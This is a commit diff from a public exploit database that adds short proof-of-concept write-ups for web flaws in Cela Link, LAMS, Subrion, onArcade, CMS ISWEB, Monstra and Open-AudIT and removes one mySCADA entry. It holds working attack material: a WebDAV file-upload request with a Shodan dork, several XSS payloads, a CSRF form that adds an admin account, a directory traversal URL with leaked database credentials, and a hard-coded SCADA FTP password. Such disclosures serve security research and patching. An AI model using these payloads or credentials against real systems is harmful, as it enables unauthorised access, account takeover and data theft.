DB: 2018-08-07

9 changes to exploits/shellcodes

mySCADA myPRO 7 - Hard-Coded Credentials

Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload

Open-AudIT Community 2.2.6 - Cross-Site Scripting
Subrion CMS 4.2.1 - Cross-Site Scripting
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
CMS ISWEB 3.5.3 - Directory Traversal
Monstra 3.0.4 - Cross-Site Scripting

exploits/hardware/webapps/45021.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload
+# Date: 2018-07-13
+# Shodan Dork: CLR-M20
+# Exploit Author: Safak Aslan
+# Software Link: http://www.celalink.com
+# Version: 2.7.1.6
+# Authentication Required: No
+# Tested on: Windows
+
+# Vulnerability Description
+# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
+# on the remote server, Cela Link CLR-M20 allows unauthorized users to upload
+# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
+# remote code execution as well.
+# Due to the WebDAV, it is possible to upload the arbitrary
+# file utilizing the PUT method.
+
+# Proof-of-Concept
+# Request
+
+PUT /test.html HTTP/1.1
+Host: targetIP
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Length: 26
+
+the reflection of random numbers 1230123012
+
+# Response
+
+HTTP/1.1 201 Created
+Content-Length: 0
+Date: Fri, 13 Jul 2018 14:38:54 GMT
+Server: lighttpd/1.4.20
+
+As a result, on the targetIP/test.html, "the reflection of random numbers
+1230123012" is reflected on the page.

exploits/java/webapps/45153.txt

@@ -0,0 +1,32 @@
+# Exploit Title: LAMS < 3.1 - Cross-Site Scripting
+# Date: 2018-08-05
+# Exploit Author: Nikola Kojic
+# Website: https://ras-it.rs/
+# Vendor Homepage: https://www.lamsfoundation.org/
+# Software Link: https://www.lamsfoundation.org/downloads_home.htm
+# Category: Web Application
+# Platform: Java
+# Version: <= 3.1
+# CVE: 2018-12090
+
+# Vendor Description:
+# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative 
+# learning activities. It provides teachers with a highly intuitive visual authoring 
+# environment for creating sequences of learning activities.
+
+# Technical Details and Exploitation:
+# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows 
+# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET
+# parameter during a forgotPasswordChange.jsp?key= password change.
+
+# Proof of Concept:
+http://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
+
+# Timeline:
+# 2018-06-07: Discovered
+# 2018-06-08: Vendor notified
+# 2018-06-08: Vendor replies
+# 2018-06-11: CVE number requested
+# 2018-06-11: CVE number assigned
+# 2018-06-15: Patch released
+# 2018-08-05: Public disclosure

exploits/multiple/remote/44656.txt

@@ -1,27 +0,0 @@
-#Exploit Title: mySCADA myPRO 7 - Hardcoded FTP Username and Password
-#Date: 2018-05-19
-#Exploit Author: Emre ÖVÜNÇ
-#Vendor Homepage: https://www.myscada.org/mypro/
-#Software Link: https://www.myscada.org/download/
-#Version: v7
-#Tested on: Linux, Windows
-
-# I. Problem Description
-
-#In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121-  username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software.
-
-# II. Technical 
-
-Hardcoded username:password = myscada:Vikuk63
-
-#Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. When you install myPRO, you can see many ports open. The vulnerability works on all supported platforms.
-
-#In my first research on the Windows OS, myPRO has many process and I noticed that ‘myscadagate.exe’ is listening to port #2121. 
-
-#I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client.
-
-#(Details: https://emreovunc.com/blog/en/mySCADA-myPRO7-Exploit.pdf)
-
-# III. Solution
-
-#As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available.

exploits/php/webapps/45150.txt

@@ -0,0 +1,18 @@
+# Exploit Title: [Subrion CMS- 4.2.1 XSS (Using component with known
+Vulnerability)]
+# Date: [02-08-2018]
+# Exploit Author: [Zeel Chavda]
+# Vendor Homepage: [https://subrion.org/]
+# Software Link: [https://subrion.org/download/]
+# Version: [4.2.1] (REQUIRED)
+# Tested on: [Windows,FireFox]
+# CVE : [CVE-2018-14840]
+
+Steps: -
+
+1. Create a file with XSS payload.
+2. Save it with .html extension.
+3. Upload via CKEditor manager and execute "file.html".
+
+Reference: -
+https://github.com/intelliants/subrion/commit/cb10ac2294cb2c3a6d2159f9a2bb8c58a2a10a47

exploits/php/webapps/45154.html

@@ -0,0 +1,25 @@
+ # Exploit Title: Cross-Site Request Forgery (Add Admin)
+ # Google Dork: Powered by onArcade v2.4.2
+ # Date: 2018/August/4
+ # Author: r3m0t3nu11[Zero-way]
+ # Software Link: ["http://www.onarcade.com"]
+ # Version: ["Uptodate"]
+
+the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
+
+
+
+[P0C]#
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://vulnapp.com/path/admin/members.php?a=add_member&ajax=1"method="POST">
+      <input type="hidden" name="username" value="r3m0t3nu11" />
+      <input type="hidden" name="email" value="l0v3rs14&#64;gmail&#46;com"/>
+      <input type="hidden" name="password" value="123123" />
+      <input type="hidden" name="user&#95;group" value="2" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/45155.txt

@@ -0,0 +1,26 @@
+# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal
+# Date: 2018-08-01
+# Exploit Author: Thiago "thxsena" Sena
+# Vendor Homepage: http://www.isweb.it
+# Version: 3.5.3
+# Tested on: Linux
+# CVE : N/A
+
+# PoC:
+# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download,
+# as demonstrated by
+
+moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php
+
+# Download and open it.
+$dati_db = array(
+    'tipo' => 'mysql',
+    'host' => 'localhost',
+    'user' => 'networkis',
+    'password' => 'guybrush77',
+    'database' => 'networkis',
+    'database_offline' => '',
+    'persistenza' => FALSE,
+    'prefisso' => '',
+    'like' => 'LIKE'
+);

exploits/php/webapps/45156.txt

@@ -0,0 +1,19 @@
+# Exploit Title:Monstra-Dev 3.0.4 Stored Cross Site Scripting
+# Date: 04-08-2018
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Software Link: https://github.com/monstra-cms/monstra
+#Published In- https://indiancybersecuritysolutions.com/cve-2018-14922-cross-site-scripting/
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : CVE-2018-14922
+
+
+#POC
+1. 1. Go  to the  site ( http://server.com/monstra-dev/ ) .
+2- Click on  Registration page  (Registration) .
+3- Register by giving you name ,mail and soo on...
+4 -Now log In i the website.
+5.After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "><svg/onload=alert(/Nainsi/)>  and in Lastname paste  "><svg/onload=alert(/Gupta/)> 
+6. After saving the above changes, click on edit profile page and you will be able to see to Pop up stating Gupta and Nainsi.

exploits/windows/webapps/45160.txt

@@ -0,0 +1,52 @@
+# Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting
+# Google Dork:NA
+# Exploit Date: 2018-08-01
+# Exploit Author: Ranjeet Jaiswal
+# Vendor Homepage: https://opmantek.com/
+# Software Link:https://opmantek.com/network-tools-download/open-audit/
+# Affected Version: 2.2.6
+# Category: WebApps
+# Tested on: Windows 10
+# CVE : CVE-2018-14493
+
+# 1. Vendor Description:
+# Network Discovery and Inventory Software | Open-AudIT | Opmantek
+# Discover what's on your network
+# Open-AudIT is the world's leading network discovery, inventory and audit
+# program. Used by over 10,000 customers.
+
+# 2. Technical Description:
+# Cross-site scripting (XSS) vulnerability on Groups Page in Open-AudIT
+# Community edition in 2.2.6 allows remote attackers to inject arbitrary web
+# script or HTML in group name,as demonstrated in below POC.
+
+# 3. Proof Of Concept:
+# 3.1. Proof of Concept for Injecting html contain
+# Step to reproduce.
+# Step1:Login in to Open-Audit
+# Step2:Go to Group page
+# Step3:Select any group which are listed
+# Step4:click on "Details tab".
+# Step5:In the Name field put the  following payload and saveit.
+
+<p>Sorry! We have moved! The new URL is: <a href="http://geektyper.com/
+">Open-Audit</a></p>
+
+# Step6:Click on "View Tab" in which payload is put.
+# Step7:When user Click on View Tab.User will see redirection hyperlink.
+# Step8:When user click on link ,User will be redirected to Attacker or
+# malicious website.
+
+# 3.2. Proof of Concept for Injecting web script(Cross-site scripting)
+
+# #Step to reproduce.
+# Step1:Login in to Open-Audit
+# Step2:Go to Groups page
+# Step3:Select any group which are listed
+# Step4:click on "Details tab" in which payload is put.
+# Step5:In the Name field put the  following payload and Saveit.
+
+<script>alert(hack)</script>
+
+# Step6:Click on "View Tab" of group in which payoad is put.
+# Step7:When user Click on View Tab an Alert Popup will execute.

files_exploits.csv

@@ -16633,7 +16633,6 @@ id,file,description,date,author,type,platform,port
 44642,exploits/linux/remote/44642.rb,"Jenkins CLI - HTTP Java Deserialization (Metasploit)",2018-05-17,Metasploit,remote,linux,8080
 44643,exploits/multiple/remote/44643.rb,"Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)",2018-05-17,Metasploit,remote,multiple,8080
 44648,exploits/windows/remote/44648.rb,"HPE iMC 7.3 - Remote Code Execution (Metasploit)",2018-05-18,TrendyTofu,remote,windows,
-44656,exploits/multiple/remote/44656.txt,"mySCADA myPRO 7 - Hard-Coded Credentials",2018-05-20,"Emre ÖVÜNÇ",remote,multiple,
 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
@@ -39708,6 +39707,7 @@ id,file,description,date,author,type,platform,port
 45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
 45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
 45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
+45021,exploits/hardware/webapps/45021.txt,"Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload",2018-07-13,"Safak Aslan",webapps,hardware,
 45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
 45027,exploits/java/webapps/45027.txt,"Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection",2018-07-16,alt3kx,webapps,java,
 45031,exploits/php/webapps/45031.txt,"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting",2018-07-16,"Berk Dusunur",webapps,php,
@@ -39727,6 +39727,7 @@ id,file,description,date,author,type,platform,port
 45062,exploits/php/webapps/45062.txt,"MSVOD 10 - 'cid' SQL Injection",2018-07-20,Hzllaga,webapps,php,
 45063,exploits/hardware/webapps/45063.txt,"Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass",2018-07-20,vulnc0d3,webapps,hardware,
 45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
+45160,exploits/windows/webapps/45160.txt,"Open-AudIT Community 2.2.6 - Cross-Site Scripting",2018-08-06,"Ranjeet Jaiswal",webapps,windows,
 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
 45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
 45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
@@ -39750,3 +39751,8 @@ id,file,description,date,author,type,platform,port
 45145,exploits/xml/webapps/45145.txt,"Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
 45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
 45148,exploits/cgi/webapps/45148.txt,"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal",2018-08-03,"Google Security Research",webapps,cgi,80
+45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,
+45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,
+45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,
+45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
+45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,